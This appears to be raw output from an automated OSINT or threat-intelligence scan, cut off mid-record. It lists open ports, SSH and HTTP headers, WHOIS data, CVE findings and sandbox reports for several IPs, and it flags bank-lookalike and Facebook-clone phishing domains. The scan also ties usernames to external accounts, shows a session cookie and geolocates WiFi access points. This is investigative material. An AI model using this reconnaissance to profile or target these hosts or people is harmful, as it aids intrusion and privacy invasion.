"search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00003364]\n 
"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00002464]\n "~DFF06F6526CD877716.TMP" has type "data"- Location: [%TEMP%\\~DFF06F6526CD877716.TMP]- [targetUID: 00000000-00002464]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF185D4F22325C47E3.TMP" has type "data"- Location: [%TEMP%\\~DF185D4F22325C47E3.TMP]- [targetUID: 00000000-00002464]\n "6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63]- [targetUID: 00000000-00002464]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002464]\n "~DF0774C0318426B25C.TMP" has type "data"- Location: [%TEMP%\\~DF0774C0318426B25C.TMP]- [targetUID: 00000000-00002464]\n "WXEY61N5.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\WXEY61N5.txt]- [targetUID: 00000000-00003364]\n "favicon_3_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://www.rstudio.com/products/rstudio/download/"- [Source: Input]\n Pattern match: "https://www.rstudio.com"- [Source: Input]'}], u'threat_level': 0, u'size': None, u'job_id': 
u'630e944ecad9df06be085b88', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [], u'certificates': [], u'hosts': [u'35.231.208.25', u'104.196.30.220'], u'sha256': u'072e3ec83c217f53774393c7c55b71b6ac38b677006d238619898149b4ae8ff0', u'sha512': u'6373a2e033dac711da1fdb13838aa849d4eaa2844baa689de28f060328cc0e1980823496573f2cdbafaa48fa2740425e7d1121d4ed136f2300d338fa96e95b78', u'image_file_characteristics': [], u'submissions': [{u'url': u'https://www.rstudio.com/products/rstudio/download/),', u'submission_id': u'630e944fcad9df06be085b89', u'created_at': u'2022-08-30T22:50:55+00:00', u'filename': None}], u'analysis_start_time': u'2022-08-30T22:50:55+00:00', u'tags': [], u'imphash': u'Unknown', u'total_network_connections': 2, u'av_detect': 0, u'machine_learning_models': [], u'total_signatures': 5, u'image_base': None, u'error_origin': None, u'ssdeep': u'Unknown', u'entrypoint_section': None, u'md5': u'b0994bcbd06abc41e182ae36f000740c', u'network_mode': u'default', u'processes': [], u'sha1': u'bd7835e0d2e2ad5d7166a9d745decc0958ec89e6', u'url_analysis': True, u'type': None, u'file_metadata': None, u'dll_characteristics': [], u'vx_family': None, u'environment_description': u'Windows 7 32 bit', u'verdict': u'no specific threat', u'minor_os_version': None, u'domains': [], u'extracted_files': [], u'type_short': []}] | 104.196.30.220 |
| 2023-05-12 03:31:23 | Malicious IP on Same Subnet | Yes | blocklist.de | 0 | 0 | 4 | 0 | None | blocklist.de List [46.101.128.0/17]; http://lists.blocklist.de/lists/all.txt | 46.101.128.0/17 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | x-cache-hits: 0 | {"content-length": "1591", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-1999\"", "x-cache-hits": "0", "cache-control": "max-age=600", "x-served-by": "cache-lga21982-LGA", "x-origin-cache": "HIT", "x-cache": "MISS", "x-github-request-id": "69FA:0168:26C3619:3A6662D:645DAA55", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 03:04:13 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "81f392d6f8601ba9f7017cc835b0845172eec1e9", "date": "Fri, 12 May 2023 02:54:13 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "0", "x-timer": "S1683860053.299752,VS0,VE13", "server": "GitHub.com", "connection": "keep-alive", "content-type": "text/css; charset=utf-8"} |
| 2023-05-12 03:00:30 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | umac-64-etm@openssh.com | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T07:25:44.787Z", "ip": "46.101.229.70", "labels": ["remote-access"], "location_updated_at": "2023-05-01T12:20:02.406356Z", "autonomous_system_updated_at": "2023-05-01T12:20:02.407454Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"www3citi5ensbnk01.nerdpol.ovh": {"record_type": "A", "resolved_at": "2023-05-08T21:52:09.615214562Z"}, "www3citizensbnk01.ddns.net": {"record_type": "A", "resolved_at": "2023-04-03T07:30:40.764584949Z"}, "www3citlzensbnk.ddns.net": {"record_type": "A", "resolved_at": "2023-04-23T19:19:28.631638390Z"}, "chainsyncpages.ddns.net": {"record_type": "A", "resolved_at": "2023-04-05T19:58:37.967204478Z"}, "mail.46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-05-03T14:09:55.384272288Z"}, "jnbt05.easypanel.host": {"record_type": "A", "resolved_at": "2023-05-10T17:13:22.939829997Z"}, "intelligent-euclid.46-101-229-70.plesk.page": {"record_type": "A", "resolved_at": "2023-04-28T22:08:15.278436745Z"}, "www.46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-04-30T14:18:11.707553225Z"}, "46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-04-30T14:18:11.520320906Z"}}, "names": ["chainsyncpages.ddns.net", "www3citi5ensbnk01.nerdpol.ovh", "www3citizensbnk01.ddns.net", "www3citlzensbnk.ddns.net", "www.46-101-229-70.cprapid.com", "46-101-229-70.cprapid.com", "intelligent-euclid.46-101-229-70.plesk.page", "jnbt05.easypanel.host", 
"mail.46-101-229-70.cprapid.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.94.145.60", "extended_service_name": "SSH", "observed_at": "2023-05-11T07:25:44.640117776Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_ORANGE", "transport_fingerprint": {"raw": "28960,64,true,MSTNW,1460,false,false", "os": "Ubuntu / Debian / CentOS", "id": 72}, "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "654b926728b59e31856ca456546380aae9ad6f0105be964db40d456c35d8474b", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "b/8s4eFX87LHgM34ZW3g9GyhRKNQyQUUsPt17LQ/ZJc=", "x": "OF+EuiYliuprX40ENBhAbc+GOunuKTpVTjg/1oXm5JM=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], 
"server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "sntrup761x25519-sha512@openssh.com", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Ubuntu-3ubuntu0.1", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_8.9p1", "raw": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1"}, "hassh_fingerprint": "699519fdcc30cbcd093d5cd01e4b1d56"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Ubuntu-3ubuntu0.1"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "Linux", "vendor": "Ubuntu", "source": "OSI_APPLICATION_LAYER", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, {"product": "OpenSSH", 
"vendor": "OpenBSD", "version": "8.9p1", "source": "OSI_APPLICATION_LAYER", "other": {"family": "OpenSSH"}, "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:8.9p1:*:*:*:*:*:*:*", "part": "a"}]}], "autonomous_system": {"bgp_prefix": "46.101.128.0/17", "country_code": "US", "asn": 14061, "name": "DIGITALOCEAN-ASN", "description": "DIGITALOCEAN-ASN"}} |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | eAdisyon@ozgen (Net ID: 00:02:6F:C9:2B:E8) | 40.2024, 29.0398 |
| 2023-05-12 03:01:31 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.62): Search Engine; Last Activity: 0 days ago; Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:44:21 | SSL Certificate - Issued to | No | SSL Certificate Analyzer | 1 | 0 | 2 | 0 | None | C=US,ST=California,L=San Francisco,O=GitHub\, Inc.,CN=*.github.io | 185.199.108.153 |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | cross-origin-embedder-policy: require-corp | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=jsIMdWNoCwdQGyyZGyYA%2Bk%2F%2FuxOwhAu2H4z%2BlgqTotxGWPo8hqWsqluH0WQNJMNDxGIz%2FauzgzXUlj2TX7zY2FcfHDEdJ6DQfKAJa9S%2BlmMzgJ2oNDB%2FfptzTg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5e7988238a-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:54:13 | Linked URL - Internal | No | Web Spider | 5 | 0 | 2 | 0 | None | https://ayhu.xyz/?__cf_chl_f_tk=tLjY4MFl6PFRYsxJBRXXPqgMr4VsmLm23dP5uGlU768-1683860053-0-gaNycGzNCiU | https://ayhu.xyz/ |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Apple Network 031c82 (Net ID: 00:02:2D:03:1C:82) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | sofurry (Category: art)
https://login.sofurry.com | login |
| 2023-05-12 02:55:15 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 165.232.113.85:80 | 165.232.113.85 |
| 2023-05-12 02:55:01 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 188.114.96.1:2083 | 188.114.96.1 |
| 2023-05-12 03:31:31 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 7 | 0 | None | abuse@namecheap.com | Domain Name: NETCRAFT.COM
Registry Domain ID: 509179_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2022-12-07T10:43:50Z
Creation Date: 1994-10-18T04:00:00Z
Registry Expiry Date: 2026-10-17T04:00:00Z
Registrar: NameCheap, Inc.
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.6613102107
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: AUTHNS1.NETCRAFT.COM
Name Server: AUTHNS2.NETCRAFT.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:12:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain name: netcraft.com
Registry Domain ID: 509179_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2020-09-21T12:40:37.88Z
Creation Date: 1994-10-18T04:00:00.00Z
Registrar Registration Expiration Date: 2026-10-17T04:00:00.00Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: fd796f83a89a42f2a69f4b9f2c757b8f.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: fd796f83a89a42f2a69f4b9f2c757b8f.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: fd796f83a89a42f2a69f4b9f2c757b8f.protect@withheldforprivacy.com
Name Server: authns1.netcraft.com
Name Server: authns2.netcraft.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-11T07:56:11.35Z <<<
For more information on Whois status codes, please visit https://icann.org/epp |
| 2023-05-12 02:44:12 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Sectigo | kekw.battleb0t.xyz |
| 2023-05-12 02:58:47 | Vulnerability - CVE Low | Yes | Tool - testssl.sh | 0 | 2 | 1 | 0 | None | CVE-2013-0169
https://nvd.nist.gov/vuln/detail/CVE-2013-0169
Score: 2.6
Description: The TLS protocol 1.1 and 1.2 and the DTLS protocol 1.0 and 1.2, as used in OpenSSL, OpenJDK, PolarSSL, and other products, do not properly consider timing side-channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue. | ayhu.xyz |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Viking (Net ID: 00:01:71:0B:CD:2E) | 52.3759, 4.8975 |
| 2023-05-12 03:20:27 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Pillowfort (Category: social)
https://www.pillowfort.social/patrick.pogoda | patrick.pogoda |
| 2023-05-12 03:15:39 | Vulnerability - CVE Medium | Yes | Tool - testssl.sh | 0 | 0 | 3 | 0 | None | CVE-2013-3587
https://nvd.nist.gov/vuln/detail/CVE-2013-3587
Score: 5.9
Description: The HTTPS protocol, as used in unspecified web applications, can encrypt compressed data without properly obfuscating the length of the unencrypted data, which makes it easier for man-in-the-middle attackers to obtain plaintext secret values by observing length differences during a series of guesses in which a string in an HTTP request URL potentially matches an unknown string in an HTTP response body, aka a "BREACH" attack, a different issue than CVE-2012-4929. | 165.232.113.85 |
| 2023-05-12 03:33:56 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | mntrRGB XYZ | https://funny.battleb0t.xyz/images/fredo.PNG |
| 2023-05-12 03:13:02 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [00.github.io]
https://www.openphish.com/feed.txt | 00.github.io |
| 2023-05-12 02:56:25 | BGP AS Membership | No | RIPE | 0 | 0 | 3 | 0 | None | 13335 | 188.114.96.0/24 |
| 2023-05-12 03:18:25 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | YouTube User2 (Category: video)
https://www.youtube.com/@Altpapier | Altpapier |
| 2023-05-12 02:55:11 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Pragma": "DISPLAY_UTF8", "Set_Cookie": "DISPLAY_UTF8", "X_Content_Type_Options": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Pragma": ["no-cache"], "Set_Cookie": ["whostmgrrelogin=no; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2087; secure", "whostmgrsession=%3a8HJb2gy62wgW5AEl%2cc019e95b194ab8d9598010e513f0ec9b; HttpOnly; path=/; port=2087; secure", "roundcube_sessid=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2087; secure", "roundcube_sessauth=expired; HttpOnly; domain=87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2087; secure", "Horde=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2087; secure", "horde_secret_key=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2087; secure", "Horde=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2087; secure", "Horde=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/horde; port=2087; secure", "PPA_ID=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2087; secure", "imp_key=expired; HttpOnly; domain=87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2087; secure", "Horde=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2087", "horde_secret_key=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2087"], "X_Content_Type_Options": ["nosniff"], "Connection": ["close"], "Content_Type": ["text/html; charset=\"utf-8\""], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["no-cache, no-store, must-revalidate, private", "no-cache, no-store, must-revalidate, private"]} | 
87.248.157.102 |
| 2023-05-12 02:47:42 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://sahnawaz786.github.io/Facebook_login_clone_project', u'type': u'submitted', u'verdict': u'suspicious'}, {u'url': u'http://sahnawaz786.github.io/facebook_login_clone_project', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://sahnawaz786.github.io/facebook_login_clone_project', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'http://sahnawaz786.github.io/Facebook_login_clone_project', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"sahnawaz786.github.io"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-127', u'name': u'Found user-agent related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"GET /Facebook_login_clone_project HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: sahnawaz786.github.io" (Indicator: "mozilla/5.0 (")\n "GET /Facebook_login_clone_project HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 
(Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: sahnawaz786.github.io" (Indicator: "user-agent: ")\n "GET /Facebook_login_clone_project/ HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: sahnawaz786.github.io" (Indicator: "mozilla/5.0 (")\n "GET /Facebook_login_clone_project/ HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: sahnawaz786.github.io" (Indicator: "user-agent: ")\n "GET /Facebook_login_clone_project/Images/fblogo.png HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: sahnawaz786.github.io\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /Facebook_login_clone_project/Images/fblogo.png HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: sahnawaz786.github.io\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /Facebook_login_clone_project/Images/facebook.svg HTTP/1.1\nAccept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5\nReferer: https://sahnawaz786.github.io/Facebook_login_clone_project/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: sahnawaz786.github.io\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /Facebook_login_clone_project/Images/facebook.svg HTTP/1.1\nAccept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5\nReferer: https://sahnawaz786.github.io/Facebook_login_clone_project/\nAccept-Language: 
